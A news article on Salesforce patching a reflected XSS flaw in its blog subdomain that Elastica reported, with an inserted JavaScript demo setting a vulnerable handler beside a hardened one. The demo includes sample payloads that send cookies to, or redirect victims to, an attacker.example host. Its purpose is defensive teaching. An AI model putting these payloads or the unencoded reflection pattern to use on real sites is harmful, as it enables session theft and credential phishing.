Salesforce Closes Door to Hack Attacks
By Shirley Siluk / CRM Daily
A cross-site scripting (XSS) vulnerability that could have opened the door to attackers has been patched by Salesforce after security researchers reported it to the company. The flaw existed in a subdomain of the cloud-based CRM platform rather than in the application itself, but because the subdomain belonged to Salesforce, links exploiting it could have been used in phishing e-mails that looked legitimate, appearing to come from within the application.

Salesforce told us in a statement today that it investigated and fixed "a minor vulnerability impacting the blog site ',' which is not connected to the Salesforce application or customer data." The company added, "We have no evidence of impact to Salesforce customers or their data."

The patch was validated on Monday by Elastica, the San Jose-based cloud application security company that first discovered the vulnerability in early July. According to Elastica, phishing e-mails built on the flaw would have looked trustworthy enough to trick users into entering their real login credentials on an attacker-controlled page, after which those credentials could have been used to access their accounts.

XSS Exploitation 'Most Prolific' Hack

Researchers in Elastica's Cloud Threat Labs said they discovered the vulnerability in a Salesforce subdomain used for blogging. The cross-site scripting (XSS) flaw arose because input supplied by a remote user in an HTTP request was returned in the page without proper filtering or encoding, which could have allowed attackers to "steal cookies and session identifiers, force users to visit phishing sites that extract credentials, and distribute malicious code to user machines."
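The pattern Elastica describes, a request parameter copied into a page without encoding, is shown below as an added example; it is not Salesforce's or Elastica's code, and the route, parameter name, payloads, session id and hostnames are all constructed for this illustration. The vulnerable handler reflects the parameter verbatim, the hardened handler encodes it for the HTML context it lands in, and the response headers limit what a surviving injection can do (HttpOnly keeps document.cookie from exposing the session id, and a CSP without inline script refuses the injected payload).

```javascript
// Added example (not Salesforce's or Elastica's code): reflected XSS of the kind
// described above, beside its hardened form. Everything here is constructed.

// Constructed attacker payloads covering two of the outcomes the researchers list:
// cookie theft, and forcing the victim onto a phishing page.
const CONSTRUCTED_PAYLOADS = {
  cookieTheft: '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>',
  phishingRedirect: '<meta http-equiv="refresh" content="0;url=https://attacker.example/login">',
};

// Constructed request shape: a GET to a hypothetical blog search route.
function requestWith(q) {
  return { method: 'GET', path: '/blog/search', query: { q } };
}

// Vulnerable handler: the "q" parameter is reflected verbatim into an HTML text node.
function renderSearchVulnerable(req) {
  const q = req.query.q || '';
  return `<h1>Results for ${q}</h1>`;
}

// HTML entity encoding for data placed in element content or quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: same output structure, but the untrusted value is encoded
// for the HTML context it lands in, so it can no longer introduce markup.
function renderSearchHardened(req) {
  const q = escapeHtml(req.query.q || '');
  return `<h1>Results for ${q}</h1>`;
}

// Defence in depth for the response. HttpOnly keeps document.cookie from leaking
// the session id; the CSP forbids inline script, so an injected <script> block is
// refused by the browser even if an encoding bug slips through elsewhere.
function hardenedHeaders(sessionId) {
  return {
    'Set-Cookie': `sid=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`,
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    'X-Content-Type-Options': 'nosniff',
  };
}

// Crude check used by the demo: did any markup from the payload survive into the page?
function containsActiveMarkup(html) {
  return /<script\b|<iframe\b|<meta\b|\bon\w+\s*=/i.test(html);
}

// Runs each payload through both handlers and reports whether it still executes.
function demo() {
  const result = {};
  for (const [name, payload] of Object.entries(CONSTRUCTED_PAYLOADS)) {
    const req = requestWith(payload);
    result[name] = {
      vulnerable: containsActiveMarkup(renderSearchVulnerable(req)), // true
      hardened: containsActiveMarkup(renderSearchHardened(req)),     // false
    };
  }
  return result;
}

console.log(demo());
console.log(hardenedHeaders('constructed-session-id'));
```

Output encoding must match the context the data is written into; the entity map above is correct for element content and quoted attribute values, but a value placed inside a script block, a URL, or a CSS property needs a different encoder.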

"Exploitation of XSS vulnerabilities is among the most prolific methods of Web application hacking today," said Aditya Sood, lead architect at Elastica's Cloud Threat Labs. "Although this particular flaw was only present in a Salesforce subdomain, exploiting the trust of the company's primary domain could have allowed attackers to easily implement phishing attacks to gain access to user credentials. With stolen credentials, attackers can then access users' accounts and exfiltrate sensitive data undetected for long periods of time."

Elastica said that when it first reported its discovery to Salesforce and provided details on how to fix the problem, the company responded that it considered the vulnerability "less severe" because it wasn't in the main domain and could target only selected users. After receiving a follow-up e-mail from Elastica noting that the vulnerability had "the potential to be exploited in the wild," Salesforce patched the flaw.

'Offensive' Strategies Against Social Engineering Attacks

We reached out to Elastica's Sood to learn more about what companies can do to protect themselves from XSS and similar vulnerabilities. He said companies should release patches as soon as possible after learning of such vulnerabilities to "reduce the window of exposure."

Companies should implement a "multi-dimensional security approach" and also be sure to educate their employees about safe surfing habits and the "perils of phishing attacks," Sood added. In addition, they should put in place security controls to require two-factor authentication on all end-user devices used to access their systems, he noted.

"Interestingly, organizations can follow an offensive approach to conduct controlled social engineering attacks, i.e., phishing attacks, to understand how the infrastructure control works and how users react to that attack," he said.


© Copyright 2018 NewsFactor Network. All rights reserved.